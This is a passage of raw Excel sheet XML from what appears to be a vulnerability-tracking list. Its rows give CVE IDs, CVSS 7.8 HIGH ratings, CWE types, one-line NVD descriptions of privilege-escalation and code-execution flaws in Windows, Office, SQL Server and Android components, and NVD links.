s="5" t="inlineStr" /><c r="Q793" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R793" s="5" t="inlineStr"><is><t>Use after free in Windows Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S793" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56177</t></is></c></row><row r="794"><c r="A794" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B794" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C794" s="5" t="inlineStr"><is><t>CVE-2026-56198</t></is></c><c r="D794" s="5" t="n"><v>7.8</v></c><c r="E794" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F794" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G794" s="5" t="inlineStr" /><c r="H794" s="5" t="n"><v>0.002</v></c><c r="I794" s="5" t="inlineStr" /><c r="J794" s="5" t="inlineStr" /><c r="K794" s="5" t="inlineStr" /><c r="L794" s="5" t="inlineStr" /><c r="M794" s="5" t="inlineStr" /><c r="N794" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O794" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P794" s="5" t="inlineStr" /><c r="Q794" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R794" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Trace Data Helper allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S794" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56198</t></is></c></row><row r="795"><c r="A795" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B795" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C795" s="5" t="inlineStr"><is><t>CVE-2026-5729</t></is></c><c r="D795" s="5" t="n"><v>7.8</v></c><c r="E795" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F795" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G795" s="5" t="inlineStr" /><c r="H795" s="5" t="n"><v>0.001</v></c><c r="I795" s="5" t="inlineStr" /><c r="J795" s="5" t="inlineStr" /><c r="K795" s="5" t="inlineStr" /><c r="L795" s="5" t="inlineStr" /><c r="M795" s="5" t="inlineStr" /><c r="N795" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O795" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P795" s="5" t="inlineStr" /><c r="Q795" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R795" s="5" t="inlineStr"><is><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is></c><c r="S795" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-5729</t></is></c></row><row r="796"><c r="A796" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B796" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C796" s="5" t="inlineStr"><is><t>CVE-2026-58599</t></is></c><c r="D796" s="5" t="n"><v>7.8</v></c><c r="E796" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F796" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G796" s="5" t="inlineStr" /><c r="H796" s="5" t="n"><v>0.003</v></c><c r="I796" s="5" t="inlineStr" /><c r="J796" s="5" t="inlineStr" /><c r="K796" s="5" t="inlineStr" /><c r="L796" s="5" t="inlineStr" /><c r="M796" s="5" t="inlineStr" /><c r="N796" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O796" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P796" s="5" t="inlineStr" /><c r="Q796" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R796" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t></is></c><c r="S796" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58599</t></is></c></row><row r="797"><c r="A797" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B797" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C797" s="5" t="inlineStr"><is><t>CVE-2026-58600</t></is></c><c r="D797" s="5" t="n"><v>7.8</v></c><c r="E797" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F797" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G797" s="5" t="inlineStr" /><c r="H797" s="5" t="n"><v>0.003</v></c><c r="I797" s="5" t="inlineStr" /><c r="J797" s="5" t="inlineStr" /><c r="K797" s="5" t="inlineStr" /><c r="L797" s="5" t="inlineStr" /><c r="M797" s="5" t="inlineStr" /><c r="N797" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O797" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P797" s="5" t="inlineStr" /><c r="Q797" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R797" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to elevate privileges locally.</t></is></c><c r="S797" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58600</t></is></c></row><row r="798"><c r="A798" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B798" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C798" s="5" t="inlineStr"><is><t>CVE-2026-58611</t></is></c><c r="D798" s="5" t="n"><v>7.8</v></c><c r="E798" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F798" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G798" s="5" t="inlineStr" /><c r="H798" s="5" t="n"><v>0.002</v></c><c r="I798" s="5" t="inlineStr" /><c r="J798" s="5" t="inlineStr" /><c r="K798" s="5" t="inlineStr"><is><t>microsoft:xbox_gaming_services</t></is></c><c r="L798" s="5" t="inlineStr" /><c r="M798" s="5" t="inlineStr" /><c r="N798" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O798" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P798" s="5" t="inlineStr" /><c r="Q798" s="5" t="inlineStr"><is><t>CWE-285</t></is></c><c r="R798" s="5" t="inlineStr"><is><t>Improper authorization in XBox Gaming Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S798" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58611</t></is></c></row><row r="799"><c r="A799" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B799" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C799" s="5" t="inlineStr"><is><t>CVE-2026-58820</t></is></c><c r="D799" s="5" t="n"><v>7.8</v></c><c r="E799" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F799" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G799" s="5" t="inlineStr" /><c r="H799" s="5" t="n"><v>0.001</v></c><c r="I799" s="5" t="inlineStr" /><c r="J799" s="5" t="inlineStr" /><c r="K799" s="5" t="inlineStr" /><c r="L799" s="5" t="inlineStr" /><c r="M799" s="5" t="inlineStr" /><c r="N799" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O799" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P799" s="5" t="inlineStr" /><c r="Q799" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R799" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible memory safety issue due to integer overflow. This could lead to local escalation of privilege with no additional execution privileges required.</t></is></c><c r="S799" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58820</t></is></c></row><row r="800"><c r="A800" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B800" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C800" s="5" t="inlineStr"><is><t>CVE-2026-58823</t></is></c><c r="D800" s="5" t="n"><v>7.8</v></c><c r="E800" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F800" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G800" s="5" t="inlineStr" /><c r="H800" s="5" t="n"><v>0.001</v></c><c r="I800" s="5" t="inlineStr" /><c r="J800" s="5" t="inlineStr" /><c r="K800" s="5" t="inlineStr" /><c r="L800" s="5" t="inlineStr" /><c r="M800" s="5" t="inlineStr" /><c r="N800" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O800" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P800" s="5" t="inlineStr" /><c r="Q800" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="R800" s="5" t="inlineStr"><is><t>In stpropnci_process_std of stpropnci_std.cc, there is a possible memory safety issue due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S800" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58823</t></is></c></row><row r="801"><c r="A801" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B801" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C801" s="5" t="inlineStr"><is><t>CVE-2026-58839</t></is></c><c r="D801" s="5" t="n"><v>7.8</v></c><c r="E801" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F801" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G801" s="5" t="inlineStr" /><c r="H801" s="5" t="n"><v>0.001</v></c><c r="I801" s="5" t="inlineStr" /><c r="J801" s="5" t="inlineStr" /><c r="K801" s="5" t="inlineStr" /><c r="L801" s="5" t="inlineStr" /><c r="M801" s="5" t="inlineStr" /><c r="N801" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O801" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P801" s="5" t="inlineStr" /><c r="Q801" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="R801" s="5" t="inlineStr"><is><t>In forEachLine of MountRegistry.cpp, there is a possible out of bounds read due to a buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S801" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58839</t></is></c></row><row r="802"><c r="A802" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B802" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C802" s="5" t="inlineStr"><is><t>CVE-2026-58846</t></is></c><c r="D802" s="5" t="n"><v>7.8</v></c><c r="E802" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F802" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G802" s="5" t="inlineStr" /><c r="H802" s="5" t="n"><v>0.001</v></c><c r="I802" s="5" t="inlineStr" /><c r="J802" s="5" t="inlineStr" /><c r="K802" s="5" t="inlineStr" /><c r="L802" s="5" t="inlineStr" /><c r="M802" s="5" t="inlineStr" /><c r="N802" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O802" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P802" s="5" t="inlineStr" /><c r="Q802" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="R802" s="5" t="inlineStr"><is><t>In kvm_iommu_map_sg of iommu.c, there is a possible use after free due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S802" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58846</t></is></c></row><row r="803"><c r="A803" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B803" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C803" s="5" t="inlineStr"><is><t>CVE-2026-58874</t></is></c><c r="D803" s="5" t="n"><v>7.8</v></c><c r="E803" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F803" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G803" s="5" t="inlineStr" /><c r="H803" s="5" t="n"><v>0.001</v></c><c r="I803" s="5" t="inlineStr" /><c r="J803" s="5" t="inlineStr" /><c r="K803" s="5" t="inlineStr" /><c r="L803" s="5" t="inlineStr" /><c r="M803" s="5" t="inlineStr" /><c r="N803" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O803" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P803" s="5" t="inlineStr" /><c r="Q803" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="R803" s="5" t="inlineStr"><is><t>In multiple functions of SmsController.java, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S803" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58874</t></is></c></row><row r="804"><c r="A804" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B804" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C804" s="5" t="inlineStr"><is><t>CVE-2026-58941</t></is></c><c r="D804" s="5" t="n"><v>7.8</v></c><c r="E804" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F804" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G804" s="5" t="inlineStr" /><c r="H804" s="5" t="n"><v>0.001</v></c><c r="I804" s="5" t="inlineStr" /><c r="J804" s="5" t="inlineStr" /><c r="K804" s="5" t="inlineStr" /><c r="L804" s="5" t="inlineStr" /><c r="M804" s="5" t="inlineStr" /><c r="N804" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O804" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P804" s="5" t="inlineStr" /><c r="Q804" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R804" s="5" t="inlineStr"><is><t>In multiple functions of iommu.c, there is a possible out of bounds read/write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S804" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58941</t></is></c></row><row r="805"><c r="A805" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B805" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C805" s="5" t="inlineStr"><is><t>CVE-2026-62697</t></is></c><c r="D805" s="5" t="n"><v>7.8</v></c><c r="E805" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F805" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G805" s="5" t="inlineStr" /><c r="H805" s="5" t="n"><v>0.003</v></c><c r="I805" s="5" t="inlineStr" /><c r="J805" s="5" t="inlineStr" /><c r="K805" s="5" t="inlineStr" /><c r="L805" s="5" t="inlineStr" /><c r="M805" s="5" t="inlineStr" /><c r="N805" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O805" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P805" s="5" t="inlineStr" /><c r="Q805" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R805" s="5" t="inlineStr"><is><t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S805" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62697</t></is></c></row><row r="806"><c r="A806" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B806" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C806" s="5" t="inlineStr"><is><t>CVE-2026-62804</t></is></c><c r="D806" s="5" t="n"><v>7.8</v></c><c r="E806" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F806" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G806" s="5" t="inlineStr" /><c r="H806" s="5" t="n"><v>0.003</v></c><c r="I806" s="5" t="inlineStr" /><c r="J806" s="5" t="inlineStr" /><c r="K806" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L806" s="5" t="inlineStr" /><c r="M806" s="5" t="inlineStr" /><c r="N806" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O806" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P806" s="5" t="inlineStr" /><c r="Q806" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R806" s="5" t="inlineStr"><is><t>External control of file name or path in Microsoft Office Word allows an unauthorized attacker to execute code locally.</t></is></c><c r="S806" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62804</t></is></c></row><row r="807"><c r="A807" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B807" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C807" s="5" t="inlineStr"><is><t>CVE-2026-62810</t></is></c><c r="D807" s="5" t="n"><v>7.8</v></c><c r="E807" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F807" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G807" s="5" t="inlineStr" /><c r="H807" s="5" t="n"><v>0.002</v></c><c r="I807" s="5" t="inlineStr" /><c r="J807" s="5" t="inlineStr" /><c r="K807" s="5" t="inlineStr" /><c r="L807" s="5" t="inlineStr" /><c r="M807" s="5" t="inlineStr" /><c r="N807" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O807" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P807" s="5" t="inlineStr" /><c r="Q807" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R807" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S807" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62810</t></is></c></row><row r="808"><c r="A808" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B808" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C808" s="5" t="inlineStr"><is><t>CVE-2026-68787</t></is></c><c r="D808" s="5" t="n"><v>7.8</v></c><c r="E808" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F808" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G808" s="5" t="inlineStr" /><c r="H808" s="5" t="n"><v>0.002</v></c><c r="I808" s="5" t="inlineStr" /><c r="J808" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K808" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L808" s="5" t="inlineStr" /><c r="M808" s="5" t="inlineStr" /><c r="N808" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O808" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P808" s="5" t="inlineStr" /><c r="Q808" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R808" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code locally.</t></is></c><c r="S808" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68787</t></is></c></row><row r="809"><c r="A809" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B809" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C809" s="5" t="inlineStr"><is><t>CVE-2026-68832</t></is></c><c r="D809" s="5" t="n"><v>7.8</v></c><c r="E809" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F809" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G809" s="5" t="inlineStr" /><c r="H809" s="5" t="n"><v>0.002</v></c><c r="I809" s="5" t="inlineStr" /><c r="J809" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K80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09" s="5" t="inlineStr" /><c r="M809" s="5" t="inlineStr" /><c r="N809" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O809" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P809" s="5" t="inlineStr" /><c r="Q809" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R809" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S809" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68832</t></is></c></row><row r="810"><c r="A810" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B810" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C810" s="5" t="inlineStr"><is><t>CVE-2026-68841</t></is></c><c r="D810" s="5" t="n"><v>7.8</v></c><c r="E810" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F810" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G810" s="5" t="inlineStr" /><c r="H810" s="5" t="n"><v>0.002</v></c><c r="I810" s="5" t="inlineStr" /><c r="J810" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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10" s="5" t="inlineStr" /><c r="M810" s="5" t="inlineStr" /><c r="N810" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O810" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P810" s="5" t="inlineStr" /><c r="Q810" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R810" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S810" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68841</t></is></c></row><row r="811"><c r="A811" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B811" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C811" s="5" t="inlineStr"><is><t>CVE-2026-68844</t></is></c><c r="D811" s="5" t="n"><v>7.8</v></c><c r="E811" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F811" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G811" s="5" t="inlineStr" /><c r="H811" s="5" t="n"><v>0.003</v></c><c r="I811" s="5" t="inlineStr" /><c r="J811" s="5" t="inlineStr" /><c r="K811" s="5" t="inlineStr" /><c r="L811" s="5" t="inlineStr" /><c r="M811" s="5" t="inlineStr" /><c r="N811" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O811" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P811" s="5" t="inlineStr" /><c r="Q811" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R811" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t></is></c><c r="S811" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68844</t></is></c></row><row r="812"><c r="A812" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B812" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C812" s="5" t="inlineStr"><is><t>CVE-2026-68845</t></is></c><c r="D812" s="5" t="n"><v>7.8</v></c><c r="E812" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F812" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G812" s="5" t="inlineStr" /><c r="H812" s="5" t="n"><v>0.003</v></c><c r="I812" s="5" t="inlineStr" /><c r="J812" s="5" t="inlineStr" /><c r="K812" s="5" t="inlineStr" /><c r="L812" s="5" t="inlineStr" /><c r="M812" s="5" t="inlineStr" /><c r="N812" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O812" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P812" s="5" t="inlineStr" /><c r="Q812" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R812" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S812" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68845</t></is></c></row><row r="813"><c r="A813" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B813" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C813" s="5" t="inlineStr"><is><t>CVE-2026-68848</t></is></c><c r="D813" s="5" t="n"><v>7.8</v></c><c r="E813" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F813" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G813" s="5" t="inlineStr" /><c r="H813" s="5" t="n"><v>0.002</v></c><c r="I813" s="5" t="inlineStr" /><c r="J813" s="5" t="inlineStr" /><c r="K813" s="5" t="inlineStr" /><c r="L813" s="5" t="inlineStr" /><c r="M813" s="5" t="inlineStr" /><c r="N813" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O813" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P813" s="5" t="inlineStr" /><c r="Q813" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R813" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S813" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68848</t></is></c></row><row r="814"><c r="A814" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B814" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C814" s="5" t="inlineStr"><is><t>CVE-2026-68850</t></is></c><c r="D814" s="5" t="n"><v>7.8</v></c><c r="E814" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F814" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G814" s="5" t="inlineStr" /><c r="H814" s="5" t="n"><v>0.002</v></c><c r="I814" s="5" t="inlineStr" /><c r="J814" s="5" t="inlineStr" /><c r="K814" s="5" t="inlineStr" /><c r="L814" s="5" t="inlineStr" /><c r="M814" s="5" t="inlineStr" /><c r="N814" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O814" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P814" s="5" t="inlineStr" /><c r="Q814" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R814" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Account allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S814" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68850</t></is></c></row><row r="815"><c r="A815" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B815" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C815" s="5" t="inlineStr"><is><t>CVE-2026-68875</t></is></c><c r="D815" s="5" t="n"><v>7.8</v></c><c r="E815" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F815" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G815" s="5" t="inlineStr" /><c r="H815" s="5" t="n"><v>0.002</v></c><c r="I815" s="5" t="inlineStr" /><c r="J815" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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15" s="5" t="inlineStr" /><c r="M815" s="5" t="inlineStr" /><c r="N815" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O815" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P815" s="5" t="inlineStr" /><c r="Q815" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R815" s="5" t="inlineStr"><is><t>Buffer over-read in Windows NTFS allows an authorized attacker to execute code locally.</t></is></c><c r="S815" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68875</t></is></c></row><row r="816"><c r="A816" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B816" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C816" s="5" t="inlineStr"><is><t>CVE-2026-68877</t></is></c><c r="D816" s="5" t="n"><v>7.8</v></c><c r="E816" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F816" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G816" s="5" t="inlineStr" /><c r="H816" s="5" t="n"><v>0.002</v></c><c r="I816" s="5" t="inlineStr" /><c r="J816" s="5" t="inlineStr" /><c r="K816" s="5" t="inlineStr" /><c r="L816" s="5" t="inlineStr" /><c r="M816" s="5" t="inlineStr" /><c r="N816" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O816" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P816" s="5" t="inlineStr" /><c r="Q816" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R816" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t></is></c><c r="S816" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68877</t></is></c></row><row r="817"><c r="A817" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B817" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C817" s="5" t="inlineStr"><is><t>CVE-2026-68885</t></is></c><c r="D817" s="5" t="n"><v>7.8</v></c><c r="E817" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F817" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G817" s="5" t="inlineStr" /><c r="H817" s="5" t="n"><v>0.003</v></c><c r="I817" s="5" t="inlineStr" /><c r="J817" s="5" t="inlineStr" /><c r="K817" s="5" t="inlineStr" /><c r="L817" s="5" t="inlineStr" /><c r="M817" s="5" t="inlineStr" /><c r="N817" s="5" 